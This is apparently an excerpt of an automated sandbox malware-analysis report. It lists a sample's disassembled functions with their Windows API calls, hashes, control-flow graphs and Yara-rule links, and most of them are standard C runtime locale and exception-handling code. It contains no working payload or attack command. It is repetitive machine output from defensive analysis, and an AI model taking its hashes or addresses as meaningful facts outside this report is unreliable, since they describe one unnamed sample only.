                                                                                    • Opcode ID: 4354bf78757ec9785c5e3dcf43c72ac1647826fac8c83460e9e006b32a4bdba9
                                                                                    • Instruction ID: 8044ba6279eabfb06d05788606d497e4012319da2d03ae2a8e784184228c3a9a
                                                                                    • Opcode Fuzzy Hash: 4354bf78757ec9785c5e3dcf43c72ac1647826fac8c83460e9e006b32a4bdba9
                                                                                    • Instruction Fuzzy Hash: D85137719042589ADF238A28CD80FE67BBCEB56304F2405E9E59AD7182D335AD47DF20
                                                                                    Function 0038F123 Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 253 38f123-38f14b 254 38f14d-38f14f 253->254 255 38f151-38f153 253->255 256 38f1a2-38f1a5 254->256 257 38f159-38f160 call 38f058 255->257 258 38f155-38f157 255->258 260 38f165-38f169 257->260 258->256 261 38f188-38f19f 260->261 262 38f16b-38f179 GetProcAddress 260->262 264 38f1a1 261->264 262->261 263 38f17b-38f186 call 38b8da 262->263 263->264 264->256
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: eb7e32fe45b910487da9300940a80d68ad317ddf9c31a82d49d010bed5b4080f
                                                                                    • Instruction ID: 9e3290205d0a49298335f691da52e0b0e5186fa7630e05380ee469752f9fd1e7
                                                                                    • Opcode Fuzzy Hash: eb7e32fe45b910487da9300940a80d68ad317ddf9c31a82d49d010bed5b4080f
                                                                                    • Instruction Fuzzy Hash: 0A01F533314315DFAB13EE69EC44A6A339EABC9320B2542B1F904EB284DA34D8019750

                                                                                    Non-executed Functions

                                                                                    Function 00397646 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,dy9,00000002,00000000,?,?,?,00397964,?,00000000), ref: 003976DF
                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,dy9,00000002,00000000,?,?,?,00397964,?,00000000), ref: 00397708
                                                                                    • GetACP.KERNEL32(?,?,00397964,?,00000000), ref: 0039771D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: ACP$OCP$dy9
                                                                                    • API String ID: 2299586839-3293070593
                                                                                    • Opcode ID: 81f80384bb236c70e6dd4fbd3ae4a951ea2ca04e5c7d663c5ae52379b9d65d2c
                                                                                    • Instruction ID: 4372084dc8c430ba262626a77c933c36f552135011b473bc27f78b3252ad6e00
                                                                                    • Opcode Fuzzy Hash: 81f80384bb236c70e6dd4fbd3ae4a951ea2ca04e5c7d663c5ae52379b9d65d2c
                                                                                    • Instruction Fuzzy Hash: 5E218622628501A6DF378F68C901BA773ABEF54B64F578424E90AD7190F732DD41C350
                                                                                    Function 0039781B Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00397927
                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00397970
                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0039797F
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 003979C7
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 003979E6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                    • String ID:
                                                                                    • API String ID: 415426439-0
                                                                                    • Opcode ID: 3edf6564807ccd163cfd03e0b24a4673b4fb06e475afa9b16adc834719510384
                                                                                    • Instruction ID: 782ed0c3123369905873c21936bb845719afc5467c52b4efd5a165cda77ae72a
                                                                                    • Opcode Fuzzy Hash: 3edf6564807ccd163cfd03e0b24a4673b4fb06e475afa9b16adc834719510384
                                                                                    • Instruction Fuzzy Hash: C1517072A28206AFEF12EFA5CC45ABE77B8FF05700F154469F915EB190E7709901CB61
                                                                                    Function 00396EB7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,0038CB0C,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00396F78
                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0038CB0C,?,?,?,00000055,?,-00000050,?,?), ref: 00396FA3
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00397106
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                    • String ID: utf8
                                                                                    • API String ID: 607553120-905460609
                                                                                    • Opcode ID: 038c76f1b5f83c4acde67f37db378e3992b3959a4890665db9f10b7916ea7d62
                                                                                    • Instruction ID: a1ab357d8aa9340c1285947506e51d2fa4134ed77672f5d1062019ecb670b89e
                                                                                    • Opcode Fuzzy Hash: 038c76f1b5f83c4acde67f37db378e3992b3959a4890665db9f10b7916ea7d62
                                                                                    • Instruction Fuzzy Hash: EA71E372A15306AADF26AB74DC47BAA73A8EF45700F11446AF506DB2C1EB70ED408760
                                                                                    Function 00384E26 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00384E32
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00384EFE
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00384F17
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00384F21
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 0ab525bb614da602efa7d1f06c78332bc880299c0b8a75ab580e658c8cec34c1
                                                                                    • Instruction ID: 7ead0a4f6ef66431de663501735a7bc5fd6e9dd7dc70fbad2c9eeed2d28cb6fd
                                                                                    • Opcode Fuzzy Hash: 0ab525bb614da602efa7d1f06c78332bc880299c0b8a75ab580e658c8cec34c1
                                                                                    • Instruction Fuzzy Hash: 3131E4B5D053199ADF21EFA4D949BCDBBB8BF08300F1041EAE508AB250EB759A85CF45
                                                                                    Function 003972CA Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0039731E
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00397368
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0039742E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 661929714-0
                                                                                    • Opcode ID: 00e2c96f47fba832c692a43f023720bc52881b65ba09d2fc1bbd2eae651d52d6
                                                                                    • Instruction ID: 5846f97f1caf31663a80b0a3afc0a6969be1116cb526dd94bfde951cac162fba
                                                                                    • Opcode Fuzzy Hash: 00e2c96f47fba832c692a43f023720bc52881b65ba09d2fc1bbd2eae651d52d6
                                                                                    • Instruction Fuzzy Hash: C46180715282179FDF2A9F29CC82BBA7BA8EF05300F1140AAED15CA6C6F734D951CB50
                                                                                    Function 00388E0B Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00388F03
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00388F0D
                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00388F1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                    • String ID:
                                                                                    • API String ID: 3906539128-0
                                                                                    • Opcode ID: 4bfc4c099c61140a062e947f99476e93e9be5483bcc1a8cb9e03b1aa822aa5a4
                                                                                    • Instruction ID: 9b2aad7d9d92094f0665d1c035fd474414b1e7e26b93bf830342f19b0bd66389
                                                                                    • Opcode Fuzzy Hash: 4bfc4c099c61140a062e947f99476e93e9be5483bcc1a8cb9e03b1aa822aa5a4
                                                                                    • Instruction Fuzzy Hash: AE31C4759113289BCB22EF64DC89B8DBBB8BF08310F5041EAE51CA7250EB709F858F44
                                                                                    Function 0038F3B5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0038D672,?,20001004,00000000,00000002,?,?,0038CC74), ref: 0038F3E9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: |,8
                                                                                    • API String ID: 2299586839-3013188374
                                                                                    • Opcode ID: a86dfbd8300d9238e8126150c98c10bbc4f58f88011ff6e223f1bc7a046e3db6
                                                                                    • Instruction ID: 2ec78536190731c68c2ff63f8817c0e43229fa8ab84e3bcc5a7edca4f6a18eb4
                                                                                    • Opcode Fuzzy Hash: a86dfbd8300d9238e8126150c98c10bbc4f58f88011ff6e223f1bc7a046e3db6
                                                                                    • Instruction Fuzzy Hash: 89E01A36500218BBCF133F61DC05AAE3E1AAF44B51F054061F9056A2208BB28921AB90
                                                                                    Function 003933D0 Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,?,?,?,003933CB,?,?,?,?,?,?,00000000), ref: 003935FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID:
                                                                                    • API String ID: 3997070919-0
                                                                                    • Opcode ID: c48d6ebeb493c011cfa4da253da6f0af5853548f48eb1f8748d8753558bb7992
                                                                                    • Instruction ID: c3a7b3d80322961fd8e8fd9a8e877e5e1c90769691ed6f9cd2a9a17936fa9fc0
                                                                                    • Opcode Fuzzy Hash: c48d6ebeb493c011cfa4da253da6f0af5853548f48eb1f8748d8753558bb7992
                                                                                    • Instruction Fuzzy Hash: C7B11EB1610605DFDB16CF2CC48AB657BE0FF45364F268658E89ACF2A1C735EA51CB40
                                                                                    Function 00384B4C Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00384B62
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FeaturePresentProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 2325560087-0
                                                                                    • Opcode ID: 5dadb192576eb53b0257232920bd58a8905880a57c76e40d676a43c78a3b82b8
                                                                                    • Instruction ID: 6e007d16e28f0fca909742a37d03b719cedbed851f2cb20c44b281f40a93c986
                                                                                    • Opcode Fuzzy Hash: 5dadb192576eb53b0257232920bd58a8905880a57c76e40d676a43c78a3b82b8
                                                                                    • Instruction Fuzzy Hash: B2514EB1A02606DFDB16CF95E9C17AABBF8FB44314F2584AAD405EB650D3749940CF50
                                                                                    Function 00394303 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 10c721250489a6c69ee5b168724b5cb7ac9d64957e1dbe3437c882bab0f0012d
                                                                                    • Instruction ID: 34fb9a60ba1b88e9da589f0c284e70946be70fd70fe091d9d2d1bd9c618e2e3d
                                                                                    • Opcode Fuzzy Hash: 10c721250489a6c69ee5b168724b5cb7ac9d64957e1dbe3437c882bab0f0012d
                                                                                    • Instruction Fuzzy Hash: 8541C2B580421DAFDF21DF79CC89EAABBB9EF45304F1442D9E418D7201DA319E858F10
                                                                                    Function 0039751D Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00397571
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 3736152602-0
                                                                                    • Opcode ID: 069c1266e7dcc378ae664da7db7adcb054ac04f76ba518141700d8324bc8ab9d
                                                                                    • Instruction ID: ae995e18127f97b1c6d37ea127aac45b21b190ba4a7a105d54c3b67a824fd815
                                                                                    • Opcode Fuzzy Hash: 069c1266e7dcc378ae664da7db7adcb054ac04f76ba518141700d8324bc8ab9d
                                                                                    • Instruction Fuzzy Hash: 2821A772628206ABDF1A9F25DC51B7A77ACEF46314F1140BAFD02DA581EB34ED44C750
                                                                                    Function 003971A4 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • EnumSystemLocalesW.KERNEL32(003972CA,00000001,00000000,?,-00000050,?,003978FB,00000000,?,?,?,00000055,?), ref: 00397216
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2417226690-0
                                                                                    • Opcode ID: 2b1bb58529f036688357c066dc46ab4d0125394900774781fe3f62ffbdbe8415
                                                                                    • Instruction ID: 4092bdc675ea64b16c86b4b6ace42f3bec298d8b622e7b32d1dee9798f668629
                                                                                    • Opcode Fuzzy Hash: 2b1bb58529f036688357c066dc46ab4d0125394900774781fe3f62ffbdbe8415
                                                                                    • Instruction Fuzzy Hash: 321129372143015FDF199F38C8A16BAB791FF84758B19482DE98647680D7717843C740
                                                                                    Function 0039774C Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,003974E6,00000000,00000000,?), ref: 00397778
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_380000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 3736152602-0
                                                                                    • Opcode ID: 02c208267097db70996c3abdac748ff8df77b168c8ba9dab1763feac27dd8789
                                                                                    • Instruction ID: 38e588baeeb1191c5baa2f69006bbb0f26c786e369fec912bf47dd0738618539
                                                                                    • Opcode Fuzzy Hash: 02c208267097db70996c3abdac748ff8df77b168c8ba9dab1763feac27dd8789
                                                                                    • Instruction Fuzzy Hash: 51F02D32524212BBEF2A5764CC09BBB7758EF40754F154865EC06A31C0DA30FD01C6A0
                                                                                    Function 0039723F Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0038EB00: GetLastError.KERNEL32(?,00000008,00393006), ref: 0038EB04
                                                                                      • Part of subcall function 0038EB00: SetLastError.KERNEL32(00000000,00000000,00000002,000000FF), ref: 0038EBA6
                                                                                    • EnumSystemLocalesW.KERNEL32(0039751D,00000001,00000000,?,-00000050,?,003978BF,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00397289
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2105229023.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2105206125.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105252055.000000000039D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105271652.00000000003D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2105320777.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
